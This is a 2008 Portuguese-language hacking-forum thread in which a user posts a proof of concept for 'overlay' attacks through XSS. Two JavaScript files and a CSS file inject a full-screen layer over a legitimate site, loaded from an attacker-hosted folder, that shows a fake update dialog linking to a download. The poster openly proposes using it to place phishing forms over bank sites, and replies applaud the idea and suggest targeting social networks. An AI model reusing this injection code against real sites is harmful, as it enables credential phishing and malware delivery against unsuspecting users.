Usando overlay para fins maléficos

Started by Mateus, 13 de July , 2008, 03:25:45 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Mateus

13 de July , 2008, 03:25:45 PM
Boa tarde, escrevi esse post para compartilhar com vcs como se faz isso:

http://superdownloads.uol.com.br/busca/ ... 74_3E.html

Eu sei.....inicialmente não parece muita coisa, mas.....se pensarem um pouco vão ver que tem todo o potencial do mundo ^^

Do mesmo modo que coloquei apenas uma foto de um dialogo que eu fiz(que só isso já seria o suficiente para pegar usuários s leigos e até alguns semi-leigos) no superdownloads poderia ter colocado um form em cima do layout do site da caixa ou de qualquer outro banco que esteja vuln à XSS.

A técnica permite que coloque-se código html "em cima" do site, assim deixando o layout inalterado e podendo posicionar o que quiser onde quiser :D

Então passei a desenvolver uma POC

O trabalho consiste em 3 arquivos 2 .js e 1 .css

Cheguei a isso: o codigo é auto-explicativo e está bem comentado

1.js(tem esse nome pra a url se for o caso ficar pequena na hora de usar):
Code Select
/*
1.js

Porta de entrada para o ataque, atacha a folha de estilos a pagina e inclui o script que operacionaliza o ataque.

*/
var place = ''; //local onde os arquivos estao hospedados, deixe assim enquanto estiver testando no proprio pc, quando hospedar em algum lugar insira a url da pasta onde hospedou os arquivos.

document.write('<link rel="stylesheet" type="text/css" href="'+place+'fly.css"><script type="text/javascript" src="'+place+'overlay.js"></script>'); //escreve o está descrito no cabecalho do arquivo.
Overlay.js:
Code Select
/*
overlay.js

Arquivo que operacionaliza o overlay, escreve a div com o conteudo e a torna visivel.

*/

var place = ''; //local onde os arquivos estao hospedados, deixe assim enquanto estiver testando no proprio pc, quando hospedar em algum lugar insira a url da pasta onde hospedou os arquivos.

function overlay() {
el = document.getElementById("overlay"); //acha o elemento overlay atraves do nome no nosso caso overlay é a div com o html que queremos mostrar e que será escrita com o comando no fim desse script.
el.style.visibility = (el.style.visibility == "visible") ? "hidden" : "visible"; //se o elemento(nossa div) estiver escondido torne-o visivel e vice-versa
}

document.write('<div id="overlay"><div><a onClick="overlay()" href="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"><img alt="" src="'+place+'Atualizar.png" width="244" height="125" class="style1"></a></div></div>'); //escreve o conteudo do nosso "ataque".

overlay(); //executa a funcao overlay
fly.css:

/*
fly.css:
Code Select
Folha de estilos essencial para o funcionamento da técnica, sua maior importancia é colocar nosa div na camada superior do site e centraliza-la=D

*/
body {
/* Deixa a tag html <body> sem margens, ocupando 100% do espaço na tela*/
height:100%;
margin:0;
padding:0;
}
#overlay {
     visibility: hidden; /* Configura a div com nosso ataque como estando inicialmente invisivel*/
     position: absolute;/* Cofigura a posição como absoluta */
left: 0px;
     top: 0px;
     width:100%;
     height:100%;
     z-index: 1000; /* Configura a posição da div no eixo z (o eixo de profundidade) é isso que faz a div aparecer sem alterar o layout do site, é como se existesse um site em cima do outro. */
     text-align:center;
}

#overlay div {
     margin: 150px auto; /* configura a distancia do topo da pagina e deixa as outras direções serem ajustadas automaticamente*/
     border:none;
}
.style1 {
border:none; /* Evita que o firefox desenhe um borda atraves das imagens linkadas */
}
a {
outline: none; /* Evita que o firefox desenhe um borda atraves das imagens linkadas */
}

tendo duvidas estou aqui para sana-las
H4X with axes 8)

wtfnicked

#1
14 de July , 2008, 06:04:56 AM
Gostei sim ;)
"If you know the enemy and know yourself, you need
not fear the result of a hundred battles." – Sun Tzu, Art of War

branco

#2
14 de July , 2008, 11:32:17 AM
rsrs parabens cara, bom vendo as voltas por cima...

até, continua injetando conhecimento hehe  ;)
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

abobre

#3
14 de July , 2008, 12:34:12 PM
Gostei do seu tutorial cara, está bem explicado !

 Parabéns e continue cooperando com o fórum !
 
 Abraços

#phobia

#4
14 de July , 2008, 04:17:39 PM
Demorei mas arrumei uma folguinha pra vir aqui neh Mateus! =p

Parabéns cara, muito bom sim além de criativo!!! xD

Bem explicado e eu tô ligado no trampo que tu teve...


Ponto positivo! ;)

vlw!

Be.Cool

#5
15 de July , 2008, 07:34:14 PM
Realmente muito legal o seu tutorial :D
E é verdade isso tem muito potencial!, imagine isso em um site de relacionamentos :D
já fico até triste só de pensar no que pode ser feito rsrsrs
Até +

A sabedoria está em suas mãos

#phobia

#6
15 de July , 2008, 08:16:19 PM
Quote from: "Be.Cool"E é verdade isso tem muito potencial!, imagine isso em um site de relacionamentos :D

Cool²

share

#7
18 de April , 2009, 10:39:27 AM
 Bom Tutorial!! xD.. :

Triplo X

#8
22 de April , 2009, 10:41:57 PM Last Edit: 20 de May , 2009, 08:49:00 AM by Triplo X
vlw
copyright
Não me venha dizer que é melhor que alguém que eu te espanco!
Todos não passamos de ratinhos que morrerão um dia como todos os outros...

anakim

#10
09 de September , 2009, 01:13:45 AM
mt bom
Why use Windows? If I have the door ;-)

renatofidelis

#11
19 de April , 2010, 09:13:37 PM Last Edit: 19 de April , 2010, 09:17:06 PM by renatofidelis
muito bom gostei vc é o cara ! 8)
Print
Go Up Pages1
User actions